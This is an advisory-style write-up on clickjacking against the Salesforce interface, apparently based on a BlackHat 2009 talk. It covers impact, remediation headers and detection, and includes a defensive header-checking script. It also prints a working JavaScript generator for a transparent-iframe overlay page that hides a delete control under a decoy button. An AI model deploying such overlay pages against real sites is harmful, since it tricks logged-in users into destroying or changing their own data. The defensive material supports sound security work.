Full Report
[part 2 in a series of 5 video write-ups from our BlackHat 09 talk, summary here]

Goal

The premise behind this video was that while we are migrating more and more services into the cloud, the front-end through which the services are accessed as well as managed is (in many cases) a web application, and we still have not figured out how to write secure web applications reliably. The implication is that business-critical services and infrastructure may be at risk due to a web developer's mistake.
Analysis Summary
This analysis is based on publicly available information about a SensePost presentation at BlackHat 2009 that demonstrated clickjacking against the Salesforce web interface. The source describes a live demonstration of a known attack class against a hosted product in 2009, so no CVE or vendor patch tied to this exact demonstration is available from the excerpt; the vulnerability class itself, however, has well-defined mitigations, which are covered below.
# Vulnerability: Clickjacking in Salesforce Web Interface
## CVE Details
- CVE ID: ***Not Explicitly Listed*** (Clickjacking is a weakness class rather than a single bug; CVEs are normally assigned only when a particular product's missing anti-framing control is fixed.)
- CVSS Score: ***Not Explicitly Listed*** (Severity depends on which action can be hijacked; user interaction is always required.)
- CWE: CWE-1021 (Improper Restriction of Rendered UI Layers or Frames), the CWE entry for clickjacking / UI redressing.
## Affected Systems
- Products: Salesforce CRM running on the Force.com platform.
- Versions: Not version-specific. Salesforce is a hosted service; the demonstration targeted it as deployed in 2009, before anti-framing response headers were in general use.
- Configurations: Any page that the browser will render inside a cross-origin frame, i.e. any response served without anti-framing directives.
## Vulnerability Description
The vulnerability demonstrated is **Clickjacking (UI Redressing)**. An attacker lures a victim who is already authenticated to Salesforce to an external, malicious webpage. That page loads the target Salesforce interface in an `<iframe>` that is made transparent (or otherwise obscured) and stacked on top of the attacker's own content. The attacker positions a visible decoy element (e.g., a "Click here for dancing pigs" button) exactly beneath a sensitive control in the framed application (e.g., a "Delete Task" button). When the victim clicks what appears to be the decoy, the click is delivered to the invisible frame and executes the privileged action inside the victim's own Salesforce session, with the victim's cookies and permissions. The browser's same-origin policy still applies, so the attacker cannot read the framed content; the attack only lets them trigger actions blindly.
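The overlay mechanics described above, as an added example rather than the SensePost demo page: a small Node script that emits the attacker-controlled HTML. The target URL, the pixel position of the victim control inside the framed page, and the decoy label are placeholders chosen for illustration (a tester measures the real offsets in a browser); none of them come from the original demonstration.

```javascript
// Added example, not code from the SensePost write-up or from Salesforce.
// Builds the attacker's overlay page for a clickjacking proof of concept.

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Returns the HTML of the overlay page. The decoy button is drawn at a fixed
// spot; the iframe is shifted so that the victim control (targetX, targetY in
// the framed page's own coordinates) lands exactly under the decoy, and the
// frame is stacked ABOVE the decoy with opacity 0. The victim sees the decoy
// through the transparent frame, but the click is delivered to the frame.
function buildClickjackPage({ targetUrl, targetX, targetY, decoyLabel, opacity = 0 }) {
  const decoy = { x: 200, y: 150, w: 160, h: 40 };
  const frameLeft = decoy.x - targetX;
  const frameTop = decoy.y - targetY;
  return `<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<style>
  #decoy  { position: absolute; left: ${decoy.x}px; top: ${decoy.y}px;
            width: ${decoy.w}px; height: ${decoy.h}px; z-index: 1; }
  /* Use opacity ~0.3 while aligning the frame during testing, then set it back to 0. */
  #target { position: absolute; left: ${frameLeft}px; top: ${frameTop}px;
            width: 1280px; height: 1024px; border: 0;
            opacity: ${opacity}; z-index: 2; }
</style>
</head>
<body>
  <button id="decoy">${escapeHtml(decoyLabel)}</button>
  <iframe id="target" src="${escapeHtml(targetUrl)}"></iframe>
</body>
</html>`;
}

// Placeholder values (assumptions, not from the talk): a task page in a
// hypothetical tenant whose "Delete" control was measured at (540, 310).
const pocHtml = buildClickjackPage({
  targetUrl: 'https://crm.example.test/task/00T000000000001',
  targetX: 540,
  targetY: 310,
  decoyLabel: 'Click here for dancing pigs',
});
console.log(pocHtml);
```

The page only works if the browser still sends the victim's session cookie when Salesforce is loaded inside a cross-site frame; a cookie marked `SameSite=Lax` or `Strict`, or a response carrying `X-Frame-Options` / `frame-ancestors`, makes the frame render unauthenticated or not at all.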
## Exploitation
- Status: **PoC available** (Demonstrated publicly at BlackHat 09).
- Complexity: Low (Requires social engineering to get the victim to visit the malicious page while logged in to Salesforce).
- Attack Vector: Network (The victim's browser must load the attacker's page; the attacker needs no access to Salesforce).
- User Interaction: Required (A single click on the decoy suffices).
## Impact
*Impact is highly dependent on the specific action being hijacked (e.g., deleting tasks, changing settings, escalating privileges).*
- Confidentiality: Low (The same-origin policy prevents the attacker from reading the framed page; data is exposed only if the hijacked click itself causes data to be sent or shared outside the victim's control.)
- Integrity: High (Allows unauthorized modification or deletion of user data, such as tasks).
- Availability: Medium (Ability to delete critical records could impact service availability for the user).
## Remediation
### Patches
*Explicit patches for this specific 2009 demonstration are not cataloged here. The standard fix for clickjacking is for the server to tell the browser which pages may be framed:*
- Send **`X-Frame-Options: DENY`** (or `SAMEORIGIN`, if the application legitimately frames its own pages) on every response that must not be rendered in a third-party frame, not only on the login page. At the time of the talk this header had only just been introduced by IE8 and was not yet honoured by every browser.
- Send **`Content-Security-Policy: frame-ancestors 'none'`** (or an explicit list of permitted origins). This directive supersedes `X-Frame-Options` in browsers that support it and should be sent alongside it for older ones; avoid `X-Frame-Options: ALLOW-FROM`, which several browsers never implemented.
- JavaScript "frame-busting" (checking `top !== self` and navigating out of the frame) was the common contemporary defense, but the framing page can defeat it, so it is at most a stopgap.
### Workarounds
- **User Education:** Warning users against clicking potentially malicious links, especially prompts that seem unrelated to the site they are currently viewing. This is weak on its own, since a well-aligned overlay shows the victim nothing suspicious.
- **Step-up for Sensitive Actions:** Requiring re-authentication or an explicit confirmation step for destructive operations such as deleting records or changing settings, so a single hijacked click cannot complete them.
- **SameSite Cookies:** Marking the session cookie `SameSite=Lax` or `Strict` (a defense that post-dates the talk) stops the browser from sending it when the page is loaded in a cross-site frame, so the framed application renders unauthenticated and the hijacked click has no session to act on.
## Detection
- **Indicators of Compromise:** Record deletions or setting changes that the affected user denies making, typically clustered immediately after the user visited an external site. In web server logs, loads of sensitive pages whose `Referer` is an external origin indicate the page was embedded by that origin; modern browsers also label such loads with `Sec-Fetch-Dest: iframe` and `Sec-Fetch-Site: cross-site`.
- **Detection Methods and Tools:** Security scanners should check every authenticated page, not just the landing page, for the presence and correct configuration of `X-Frame-Options` and `Content-Security-Policy: frame-ancestors`. A WAF or reverse proxy can add these headers to responses when the application itself cannot be changed, but enforcement by the browser of headers it receives remains the actual defense.
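The header check that the Remediation and Detection sections call for, as an added example that is not part of the original write-up or any vendor tool: a Node function that evaluates a response's anti-framing headers the way a CSP2-capable browser would, including the cases a naive "is X-Frame-Options present" check gets wrong (report-only CSP, conflicting values, `ALLOW-FROM`). The header sets at the bottom are constructed samples, not captured Salesforce responses.

```javascript
// Added example, not code from the SensePost write-up or from Salesforce.
// Classifies a response's anti-framing headers so a scanner can flag pages
// that a clickjacking page could still frame.

// Every value of `name` (case-insensitive), splitting comma-joined and
// array-valued duplicates, since a response may carry a header more than once.
function headerValues(headers, name) {
  const values = [];
  for (const [key, raw] of Object.entries(headers)) {
    if (key.toLowerCase() !== name) continue;
    for (const item of [].concat(raw)) {
      for (const part of String(item).split(',')) {
        const value = part.trim();
        if (value) values.push(value);
      }
    }
  }
  return values;
}

// Source list of the first enforced frame-ancestors directive, or null if none.
// Content-Security-Policy-Report-Only is deliberately ignored: it never blocks.
function frameAncestors(headers) {
  for (const policy of headerValues(headers, 'content-security-policy')) {
    for (const directive of policy.split(';')) {
      const tokens = directive.trim().split(/\s+/).filter(Boolean);
      if (tokens.length && tokens[0].toLowerCase() === 'frame-ancestors') {
        return tokens.slice(1).map((t) => t.toLowerCase());
      }
    }
  }
  return null;
}

// Verdicts: 'blocked' (no page may frame it), 'restricted' (only same-origin or
// listed origins may), 'frameable' (any page may), 'misconfigured' (protection
// varies by browser; fix the header).
function framingPolicy(headers) {
  const ancestors = frameAncestors(headers);
  if (ancestors !== null) {
    // CSP2: when both headers are present, frame-ancestors wins and
    // X-Frame-Options is ignored, so evaluate it first.
    if (ancestors.length === 0 || ancestors.includes("'none'")) {
      return { verdict: 'blocked', reason: "CSP frame-ancestors 'none'" };
    }
    if (ancestors.some((t) => t === '*' || t === 'https:' || t === 'http:')) {
      return { verdict: 'frameable', reason: `CSP frame-ancestors allows any origin: ${ancestors.join(' ')}` };
    }
    return { verdict: 'restricted', reason: `CSP frame-ancestors limited to: ${ancestors.join(' ')}` };
  }

  const xfo = headerValues(headers, 'x-frame-options').map((v) => v.toUpperCase());
  if (xfo.length === 0) {
    return { verdict: 'frameable', reason: 'no X-Frame-Options and no enforced frame-ancestors' };
  }
  if (new Set(xfo).size > 1) {
    // "DENY, SAMEORIGIN", or two headers with different values: browsers do not agree on the result.
    return { verdict: 'misconfigured', reason: `conflicting X-Frame-Options values: ${xfo.join(' | ')}` };
  }
  const value = xfo[0];
  if (value === 'DENY') return { verdict: 'blocked', reason: 'X-Frame-Options: DENY' };
  if (value === 'SAMEORIGIN') return { verdict: 'restricted', reason: 'X-Frame-Options: SAMEORIGIN' };
  if (value.startsWith('ALLOW-FROM')) {
    // Chrome and Safari never implemented ALLOW-FROM and treat the header as absent.
    return { verdict: 'misconfigured', reason: 'X-Frame-Options ALLOW-FROM is not honoured by all browsers; use CSP frame-ancestors' };
  }
  return { verdict: 'misconfigured', reason: `unrecognised X-Frame-Options value: ${value}` };
}

// The header pair the Remediation section recommends, run through the same check.
function hardenedHeaders() {
  return { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': "frame-ancestors 'none'" };
}

// Constructed samples: a 2009-style response with no protection, a report-only
// policy that enforces nothing, an ALLOW-FROM only some browsers honour, and
// the hardened pair.
const samples = {
  legacy: { 'Content-Type': 'text/html' },
  reportOnly: { 'Content-Security-Policy-Report-Only': "frame-ancestors 'none'" },
  allowFrom: { 'X-Frame-Options': 'ALLOW-FROM https://partner.example' },
  hardened: hardenedHeaders(),
};
for (const [name, headers] of Object.entries(samples)) {
  const { verdict, reason } = framingPolicy(headers);
  console.log(`${name.padEnd(10)} ${verdict.padEnd(13)} ${reason}`);
}
```

Run it against the headers of every authenticated page a crawler reaches, not just the login or landing page; a single unprotected page that performs a state change is enough for the attack described above.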
## References
- Article Context: SensePost BlackHat 09 presentation on Clickjacking against Salesforce.
- Related Concept (Defanged): `hXXps://en.wikipedia.org/wiki/Clickjacking`
- Related Concept (Defanged): `hXXps://jeremiahgrossman.blogspot.com/2008/10/clickjacking-web-pages-can-see-and-hear.html`